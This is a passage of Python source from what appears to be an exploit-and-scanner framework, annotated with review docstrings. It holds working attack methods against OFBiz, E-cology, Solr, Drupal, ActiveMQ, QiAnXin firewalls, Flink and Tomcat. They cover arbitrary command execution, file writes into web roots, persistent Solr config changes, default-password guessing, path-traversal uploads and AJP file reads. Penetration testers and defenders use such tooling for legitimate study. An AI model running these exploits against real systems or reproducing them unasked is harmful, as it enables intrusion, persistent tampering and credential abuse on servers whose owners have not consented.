    def cve_2021_30128_exp(self, cmd):
        """POST the OFBiz SOAP payload with ``cmd`` substituted for ``RECOMMAND``.

        ``cmd`` is UTF-8 encoded and rendered as a lowercase hex string before
        it replaces the ``RECOMMAND`` marker in
        ``self.payload_cve_2021_30128_exp``. Only the HTTP status code of the
        response to ``/webtools/control/SOAPService`` is inspected: a 200 is
        printed as "Executed Successfully (But No Echo)" regardless of the
        response body, so the printed result is not evidence of execution.

        NOTE(review): ``self.raw_data`` is read on the success path but is
        never assigned in this method; it relies on an earlier method having
        set it (the other ``_exp`` methods on this page assign it from
        ``dump.dump_all``). If it is unset, the resulting AttributeError is
        absorbed by the generic ``except Exception`` below and reported as a
        plain error. ``verify=False`` disables TLS certificate validation for
        this request.
        """
        vul_name = "Apache OFBiz: CVE-2021-30128"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': 'text/xml',
            'Connection': 'close'
        }

        def _trans(s):
            # Lowercase hex, two digits per byte, no separators.
            return "%s" % ''.join('%.2x' % x for x in s)

        try:
            dns_data = bytes(cmd, encoding="utf8")
            dns_hex = _trans(dns_data)
            #print(cmd)
            #print(dns_hex)

            data = self.payload_cve_2021_30128_exp.replace(
                "RECOMMAND", dns_hex)
            url = urljoin(self.url, "/webtools/control/SOAPService")
            #print(data)
            request = requests.post(url,
                                    data=data,
                                    headers=headers,
                                    timeout=self.timeout,
                                    verify=False)
            # Status-only check: the body is not examined at all, so any 200
            # (whatever the server actually did) is reported as success.
            if request.status_code == 200:
                r = "Command Executed Successfully (But No Echo)"
            else:
                r = "Command Executed Failed... ..."
            verify.exploit_print(r, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception as e:
            # Broad catch-all; the exception detail bound to ``e`` is dropped.
            verify.error_print(vul_name)
 def time_2021_0515_exp(self, cmd):
     """POST ``self.payload_time_2021_0515`` to the WorkflowServiceXml endpoint.

     ``cmd`` is not placed in the body; it is sent verbatim as a ``cmd``
     request header while the body is the fixed SOAP payload. The complete
     request/response dump is stored on ``self.raw_data`` and the raw
     response text is handed to ``verify.exploit_print`` with no success
     check, so whatever the server returns is printed as the result.
     Timeouts and connection failures go to the ``verify`` printers; any
     other exception is swallowed by the generic handler.
     """
     vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
     # Note the literal "%20" before "/WorkflowServiceXml": it is sent as
     # part of the request path exactly as written here.
     url = urljoin(self.url, "/services%20/WorkflowServiceXml")
     headers = {
         'User-Agent': self.ua,
         'SOAPAction': '""',
         'cmd': cmd,
         "Content-Type": "text/xml;charset=UTF-8"
     }
     data = self.payload_time_2021_0515
     try:
         # verify=False: TLS certificate validation is disabled.
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         # Shared instance state: other methods read self.raw_data later.
         self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
 def cve_2019_17558_exp(self, cmd):
     """Three-request Solr sequence: list cores, change core config, fetch.

     1. GET ``/solr/admin/cores?indexInfo=false&wt=json`` and take the first
        key of ``status`` as the core name.
     2. POST ``set_api_data`` to ``/solr/<core>/config``. This is a persistent
        configuration change on the target (it enables the Velocity response
        writer) and nothing here reverts it.
     3. GET ``/solr/<core>`` followed by the payload with ``cmd`` substituted
        for ``RECOMMAND`` and print the response text verbatim.

     NOTE(review): the inner ``except AttributeError`` does not cover the
     failures that step 1 can actually produce — ``json.loads`` raising
     ``ValueError``, a missing ``"status"`` key (``KeyError``) or an empty
     status dict (``IndexError``) all escape to the outer generic handler.
     If ``core_name`` stays ``None`` the later URLs contain the literal
     string ``None``. ``verify=False`` disables TLS validation on every
     request below.
     """
     vul_name = "Apache Solr: CVE-2019-17558"
     core_name = None
     payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
         try:
             # First core listed under "status"; dict order decides which one.
             core_name = list(json.loads(request.text)["status"])[0]
         except AttributeError:
             pass
         # str(core_name) turns a None core into the path segment "None".
         url_api = self.url + "/solr/" + str(core_name) + "/config"
         headers_json = {'Content-Type': 'application/json', 'User-Agent': self.ua}
         set_api_data = """
         {
           "update-queryresponsewriter": {
             "startup": "lazy",
             "name": "velocity",
             "class": "solr.VelocityResponseWriter",
             "template.base.dir": "",
             "solr.resource.loader.enabled": "true",
             "params.resource.loader.enabled": "true"
           }
         }
         """
         # Config-change response is overwritten by the next request and is
         # never checked, so a rejected config update is not detected here.
         request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False)
         request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers,
                                timeout=self.timeout, verify=False)
         # Local, unlike the _exp methods above that assign self.raw_data.
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
 def cve_2018_7602_poc(self):
     """Drupal CVE-2018-7602 check, executed under ``self.threadLock``.

     The check needs an authenticated session: it logs in with the
     hard-coded ``admin``/``admin`` pair, reads the user id from the
     ``foaf:name`` meta tag, walks the account-cancel form to obtain
     ``form_token`` and ``form_build_id``, and finally looks for the random
     marker ``md`` in the last response. If the marker is absent it falls
     back to a version heuristic over ``/CHANGELOG.txt``.

     Result reporting (all via ``self.vul_info`` and ``verify.scan_print``):
       * ``PoCSuCCeSS`` - ``md`` found in the response (via ``misinformation``).
       * ``PoC_MaYbE``  - CHANGELOG served with 200, contains "Drupal", and
         neither "7.59" nor "8.5.3" appears among the version-looking strings.
         Every other version string — including releases newer than those
         two — lands in this branch, so "maybe" is a weak signal.
       * ``null``      - otherwise.

     NOTE(review): every request-path value (session, soup, form, ids) is
     stored on ``self`` rather than in locals; that is only safe because the
     whole body runs while ``self.threadLock`` is held. The lock is released
     by a plain statement after the ``try``, not in a ``finally`` — if
     ``random_md5()`` or one of the ``verify`` printers raises, the lock is
     never released. A missing meta tag or form makes ``.find()`` return
     ``None`` and the following ``.get`` raises AttributeError, which the
     generic handler reports as a plain error. ``verify=False`` disables TLS
     validation on every request.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info[
         "vul_name"] = "Drupal drupalgeddon2 remote code execution"
     self.vul_info["vul_numb"] = "CVE-2018-7602"
     self.vul_info["vul_apps"] = "Drupal"
     self.vul_info["vul_date"] = "2018-06-19"
     self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                 "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                 "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     # Fixed credential pair; the check cannot proceed without a valid login.
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     # Random marker echoed back on success; avoids matching static content.
     md = random_md5()
     cmd = "echo " + md
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         # Login response is not checked; a failed login is only noticed
         # later when the expected page elements are missing.
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         # .find() -> None when the tag is absent; .get then raises.
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         # "about" is either a path ("user/N") or "?q=user/N"; keep the
         # part after "=" in the second case.
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         # misinformation() is a project helper; presumably it filters
         # reflected occurrences of md before the membership test — verify.
         if md in misinformation(self.r.text, md):
             self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         else:
             # Fallback: version heuristic. self.payload is not assigned in
             # this method, and a body on a GET is unusual — looks like a
             # copy-paste leftover; confirm against the rest of the class.
             self.request = requests.get(self.url + "/CHANGELOG.txt",
                                         data=self.payload,
                                         headers=self.headers,
                                         timeout=self.timeout,
                                         verify=False)
             self.rawdata = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             # Collects every "d.d" / "d.d.d"-shaped string in the changelog.
             self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                      self.request.text)
             if self.request.status_code == 200 and r"Drupal" in self.request.text:
                 # Only the two exact fixed-version strings exclude a
                 # "maybe"; any other version list, newer ones included,
                 # is reported as possibly vulnerable.
                 if '7.59' not in self.allver and '8.5.3' not in self.allver:
                     self.vul_info["vul_data"] = dump.dump_all(
                         self.r).decode('utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info[
                         "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                     self.vul_info[
                         "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         # Catch-all; the bound exception is not logged.
         verify.error_print(self.vul_info["prt_name"])
     # Not in a finally: skipped if anything above the try or a printer raises.
     self.threadLock.release()
<doc_update>
    def cve_2015_5254_poc(self):
        """ActiveMQ CVE-2015-5254 version check behind the ``/admin`` console.

        Tries each ``user:pass`` entry of ``self.passlist`` as HTTP Basic
        credentials against ``/admin``; on the first 200 it stores that pair
        in ``vul_info["vul_payd"]``, scrapes the second ``<td><b>…</b></td>``
        cell as the version string, strips the dots and compares the result
        numerically with 5130 (i.e. "5.13.0"). Below that it reports
        ``PoC_MaYbE``; otherwise the entry is printed with ``prt_resu`` left
        at ``"null"``. The check is therefore a version heuristic, not a
        deserialization test, and any 200 here also means the console
        accepted one of these default passwords.

        NOTE(review): the labels are inconsistent — ``prt_name`` spells the
        product "AcitveMQ" and ``vul_name`` says "Apache Flink" although the
        check targets ActiveMQ (these are runtime strings and are left as
        is). ``self.ver = 5555`` is a sentinel that fails the ``< 5130`` test
        when no login succeeds. Comparing a dot-stripped version as an
        integer is fragile ("5.9.1" becomes 591 while "5.13.10" becomes
        51310), so the ordering only holds for some version shapes. The
        lock release at the end is not in a ``finally``. ``verify=False``
        disables TLS validation.
        """
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2015-5254"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Apache Flink 反序列化漏洞"
        self.vul_info["vul_numb"] = "CVE-2015-5254"
        self.vul_info["vul_apps"] = "AcitveMQ"
        self.vul_info["vul_date"] = "2015-07-01"
        self.vul_info["vul_vers"] = "< 5.13.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "反序列化漏洞"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的" \
                                    "Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。"
        self.vul_info["cre_date"] = "2021-01-07"
        self.vul_info["cre_auth"] = "zhzyker"
        # Default-credential candidates tried in order.
        self.passlist = [
            "admin:123456", "admin:admin", "admin:123123", "admin:activemq",
            "admin:12345678"
        ]
        # Sentinel: stays 5555 (>= 5130) unless a login succeeds.
        self.ver = 5555
        try:
            try:
                for self.pa in self.passlist:
                    self.base64_p = base64.b64encode(str.encode(self.pa))
                    self.p = self.base64_p.decode('utf-8')
                    self.headers_base64 = {
                        'User-Agent': self.ua,
                        'Authorization': 'Basic ' + self.p
                    }
                    self.request = requests.get(self.url + "/admin",
                                                headers=self.headers_base64,
                                                timeout=self.timeout,
                                                verify=False)
                    self.rawdata = dump.dump_all(self.request).decode(
                        'utf-8', 'ignore')
                    if self.request.status_code == 200:
                        # The accepted credential pair is recorded in the
                        # result, so the report itself contains a secret.
                        self.vul_info["vul_payd"] = self.pa
                        # [1]: second bold table cell; IndexError if absent.
                        self.get_ver = re.findall("<td><b>(.*)</b></td>",
                                                  self.request.text)[1]
                        # "5.13.0" -> "5130"; compared as an int below.
                        self.ver = self.get_ver.replace(".", "")
                        break
            except IndexError:
                # Version cell not found: self.ver keeps the sentinel and
                # the loop is abandoned without trying remaining pairs.
                pass
            if int(self.ver) < 5130:
                self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"

                self.vul_info[
                    "prt_info"] = "[maybe] [version: " + self.get_ver + "] [version check]"
                verify.scan_print(self.vul_info)
            else:
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as e:
            # Unlike the sibling methods, this one prints the exception.
            print(e)
            verify.error_print(self.vul_info["prt_name"])
        # Not in a finally: skipped if a printer raises.
        self.threadLock.release()
 def time_2021_0410_poc(self):
     """QiAnXin NS-NGFW check via the ``deleteImage`` RPC action.

     Builds a JSON RPC body whose ``data`` entry embeds ``cmd`` (an ``echo``
     of the random marker ``md``) redirected into ``/var/www/html/<md>.txt``,
     POSTs it to ``/directdata/direct/router`` and then GETs ``<md>.txt``
     relative to ``self.url``. Success (``PoCSuCCeSS``) requires the marker
     in the GET body (filtered by ``misinformation``), the file name itself
     *not* in the body (to reject reflected input), and status 200.

     NOTE(review): on a vulnerable host this leaves ``<md>.txt`` in the web
     root; nothing here removes it, so the artefact persists after the scan.
     ``vul_numb`` is set to "time-2021-0415" while ``prt_name`` says
     "time-2021-0410" — one of the two looks wrong (runtime strings, left as
     is). ``urljoin(self.url, md + ".txt")`` resolves a relative reference,
     so the fetched URL depends on whether ``self.url`` ends in "/". The
     lock release is not in a ``finally``. ``verify=False`` disables TLS
     validation.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "QiAnXin NS-NGFW: time-2021-0410"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info[
         "vul_name"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
     self.vul_info["vul_numb"] = "time-2021-0415"
     self.vul_info["vul_apps"] = "QiAnXin"
     self.vul_info["vul_date"] = "2021-04-10"
     self.vul_info["vul_vers"] = "unknow"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "RCE"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
     self.vul_info["cre_date"] = "2021-04-16"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(self.url, "/directdata/direct/router")
     # Random marker: both the echoed content and the file name.
     md = random_md5()
     cmd = "echo " + md
     data = {
         "action":
         "SSLVPN_Resource",
         "method":
         "deleteImage",
         "data": [{
             "data": [
                 "/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md +
                 ".txt"
             ]
         }],
         "type":
         "rpc",
         "tid":
         17
     }
     # Serialised once; the same string is later stored as vul_payd.
     data = json.dumps(data)
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         # Relative join: the path of self.url decides where <md>.txt lands.
         url = urljoin(self.url, md + ".txt")
         # A GET with a body ("1") is unusual; the server presumably ignores it.
         req = requests.get(url,
                            data="1",
                            headers=self.headers,
                            timeout=self.timeout,
                            verify=False)
         # All three conditions must hold; the "<md>.txt not in body" clause
         # guards against the request path being reflected back.
         if md in misinformation(req.text, md) and (
                 md + ".txt") not in req.text and req.status_code == 200:
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_info"] = "[rce:" + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         # Catch-all; the bound exception is not logged.
         verify.error_print(self.vul_info["prt_name"])
     # Not in a finally: skipped if a printer raises.
     self.threadLock.release()
    def cve_2020_17518_poc(self):
        """Apache Flink CVE-2020-17518 check against ``/jars/upload``.

        Sends a hand-built multipart body whose ``filename`` contains a
        ``../../../../../../tmp/<random>`` traversal, then classifies the
        result as ``PoC_MaYbE`` when a plain GET of ``/jars/upload`` returned
        404, the POST returned 400, and the body names
        ``org.apache.flink.runtime.rest.handler.RestHandlerException``. No
        read-back of the written file is attempted, hence "maybe" only.

        NOTE(review): this method overwrites ``self.headers`` (shared
        instance state that the other ``_poc`` methods pass to ``requests``)
        with a multipart ``Content-Type`` and never restores it, so any
        method that runs afterwards on the same instance inherits that
        header. When the 404/400 pair matches but the exception marker is
        absent, no ``verify.scan_print`` call happens at all — that case is
        silently dropped instead of being printed with ``prt_resu`` "null".
        The boundary string is a fixed literal, so the request has a static
        fingerprint. The lock release is not in a ``finally``; ``verify=False``
        disables TLS validation.
        """
        # 2020-01-07
        self.threadLock.acquire()
        # Random file name used in both the payload and the report.
        self.name = random_md5()
        self.vul_info["prt_name"] = "Apache Flink: CVE-2020-17518"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info[
            "vul_payd"] = 'Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name
        self.vul_info["vul_name"] = "Apache Flink 任意文件写入漏洞"
        self.vul_info["vul_numb"] = "CVE-2020-17518"
        self.vul_info["vul_apps"] = "Flink"
        self.vul_info["vul_date"] = "2021-01-05"
        self.vul_info["vul_vers"] = "< 1.11.3 or < 1.12.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件写入"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。" \
                                    "Apache Flink 控制面板的Submit New Job处存在任意文件上传:"
        self.vul_info["cre_date"] = "2021-01-07"
        self.vul_info["cre_auth"] = "zhzyker"
        self.info = "null"

        self.method = "post"
        self.r = "PoCWating"
        # Replaces the instance-wide headers; see docstring.
        self.headers = {
            'User-Agent':
            self.ua,
            'Connection':
            'close',
            'Content-Type':
            'multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y'
        }
        # Multipart body assembled by hand with "\n" line endings rather
        # than the "\r\n" the multipart format normally uses.
        self.data = '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y'
        self.data += '\nContent-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name
        self.data += '\n\nsuccess'
        self.data += '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--'
        try:
            # Baseline: the endpoint is expected to answer 404 to a GET.
            self.r404 = requests.get(self.url + "/jars/upload",
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
            self.request = requests.post(self.url + "/jars/upload",
                                         data=self.data,
                                         headers=self.headers,
                                         timeout=self.timeout,
                                         verify=False)
            self.rawdata = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            if self.r404.status_code == 404 and self.request.status_code == 400:
                # No else: when the marker is missing nothing is printed.
                if r"org.apache.flink.runtime.rest.handler.RestHandlerException:" in self.request.text:
                    self.vul_info["vul_data"] = dump.dump_all(
                        self.request).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info[
                        "prt_info"] = "[maybe] [upload: /tmp/" + self.name + "]"
                    verify.scan_print(self.vul_info)
            else:
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
        # Not in a finally: skipped if a printer raises.
        self.threadLock.release()
 def cve_2020_1938_poc(self):
     """Tomcat CVE-2020-1938 ("Ghostcat") check over a raw AJP13 socket.

     Opens a TCP connection to ``self.hostname:self.port`` (no HTTP), builds
     an AJP forward request for ``/`` with ``javax.servlet.include.*``
     request attributes pointing at ``WEB-INF/web.xml``, and joins the data
     packets of the reply. It reports ``PoCSuCCeSS`` only when the joined
     text contains both "Welcome to Tomcat" and "You may obtain a copy of
     the License at" — i.e. the stock ROOT webapp's ``web.xml``. A custom
     ``web.xml`` returned through the same path is therefore *not*
     recognised (false negative). The precondition being probed is an AJP
     connector reachable from the network.

     NOTE(review): the early ``return None, None`` when no AJP responses
     arrive exits while ``self.threadLock`` is still held — the release at
     the bottom is never reached, and every other ``_poc`` method on this
     instance then blocks forever. ``socket.setdefaulttimeout`` is
     process-global and affects every socket created afterwards, not just
     this one. The socket and its file object are never closed. The Basic
     auth branch is dead (``username``/``password`` are fixed to ``None``)
     and would not run on Python 3 anyway: ``str.encode('base64')`` is a
     Python 2 codec and ``.replace("\\n" "")`` is a one-argument call
     (implicit string concatenation). ``self.default_headers`` is empty, so
     the header-copy loop never executes.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Tomcat: CVE-2020-1938"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "WEB-INF/web.xml"
     self.vul_info["vul_name"] = "Tomcat ajp13 协议任意文件读取"
     self.vul_info["vul_numb"] = "CVE-2020-1938"
     self.vul_info["vul_apps"] = "Tomcat"
     self.vul_info["vul_date"] = "2020-02-20"
     self.vul_info["vul_vers"] = "< 7.0.100, < 8.5.51, < 9.0.31"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "任意文件读取 "
     self.vul_info["vul_data"] = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \
                                 ">_< So there is no HTTP protocol request and response"
     self.vul_info["vul_desc"] = "该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数," \
                                 "读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = self.headers
     self.output_method = "ajp"
     # self.port is used as the AJP port, whatever it was configured as.
     self.default_port = self.port
     self.default_requri = '/'
     self.default_headers = {}
     # Fixed to None, which makes the SC_REQ_AUTHORIZATION branch unreachable.
     self.username = None
     self.password = None
     self.getipport = urlparse(self.url)
     self.hostname = self.getipport.hostname
     self.request = "null"
     self.default_file = "WEB-INF/web.xml"
     try:
         # Process-wide side effect: applies to all sockets created later.
         socket.setdefaulttimeout(self.timeout)
         self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         # SO_REUSEADDR has no useful effect on a client socket.
         self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
         self.socket.connect((self.hostname, self.default_port))
         self.stream = self.socket.makefile("rb",
                                            buffering=0)  # PY2: bufsize=0
         # Include-attributes that select which file the servlet reads.
         self.attributes = [
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.request_uri', '/']
             },
             {
                 'name': 'req_attribute',
                 'value':
                 ['javax.servlet.include.path_info', self.default_file]
             },
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.servlet_path', '/']
             },
         ]
         method = 'GET'
         # Double-underscore name: name-mangled inside the ApacheTomcat
         # class body, so this only resolves if called from that class.
         self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
             self,
             self.hostname,
             self.default_requri,
             method=AjpForwardRequest.REQUEST_METHODS.get(method))
         if self.username is not None and self.password is not None:
             # Dead on Python 3 (see docstring); left untouched.
             self.forward_request.request_headers[
                 'SC_REQ_AUTHORIZATION'] = "Basic " + str(
                     ("%s:%s" % (self.username, self.password)
                      ).encode('base64').replace("\n"
                                                 ""))
         # default_headers is {} above, so this loop body never runs.
         for h in self.default_headers:
             self.forward_request.request_headers[h] = headers[h]
         for a in self.attributes:
             self.forward_request.attributes.append(a)
         self.responses = self.forward_request.send_and_receive(
             self.socket, self.stream)
         if len(self.responses) == 0:
             # BUG: returns with self.threadLock still acquired.
             return None, None
         self.snd_hdrs_res = self.responses[0]
         # Everything between the SEND_HEADERS packet and the final packet.
         self.data_res = self.responses[1:-1]
         self.request = (b"".join([d.data for d in self.data_res]).decode())
         # Matches only the default ROOT web.xml wording.
         if r"Welcome to Tomcat" in self.request and r"You may obtain a copy of the License at" in self.request:
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[ajp13] [port:" + str(
                 self.default_port) + " file:" + self.default_file + "]"
         verify.scan_print(self.vul_info)
     except socket.timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except Exception as error:
         # Connection refused etc. end up here as a generic error.
         verify.error_print(self.vul_info["prt_name"])
     # Not in a finally; also skipped by the early return above.
     self.threadLock.release()
    def cve_2019_17558_poc(self):
        """Apache Solr CVE-2019-17558 check using an out-of-band DNS callback.

        Same three-step sequence as ``cve_2019_17558_exp`` (list cores, POST
        a Velocity response-writer config change to ``/solr/<core>/config``,
        GET the payload) but the substituted command is a ``ping`` to
        ``<md>.<self.ceye_domain>``; success is then decided by polling
        ``self.ceye_api + self.ceye_token`` for the marker ``md``. Results:
        ``PoCSuCCeSS`` if the marker shows up on the callback service,
        ``PoC_MaYbE`` if the config POST returned 200 and a core name was
        found, ``null`` otherwise. The config change is persistent on the
        target and is not reverted.

        NOTE(review): ``vul_numb`` is "CVE-2018-17558" while ``prt_name``
        and the method name say CVE-2019-17558 (runtime string, left as is),
        and unlike the sibling methods no ``cre_date`` is set. In the success
        branch ``core_name`` is concatenated without the ``is not None``
        guard the "maybe" branch has, so a callback hit with no core name
        raises TypeError and is reported as a generic error instead of a
        success. The callback GET has no timeout. The bare ``except:`` hides
        every parsing failure. ``verify=False`` disables TLS validation on
        the target requests.
        """
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace(
            "RECOMMAND", "whoami")
        self.vul_info[
            "vul_name"] = "Apache Solr Velocity template Remote Code Execution"
        self.vul_info["vul_numb"] = "CVE-2018-17558"
        self.vul_info["vul_apps"] = "Solr"
        self.vul_info["vul_date"] = "2017-10-16"
        self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Remote Code Execution"
        self.vul_info["vul_data"] = "null"
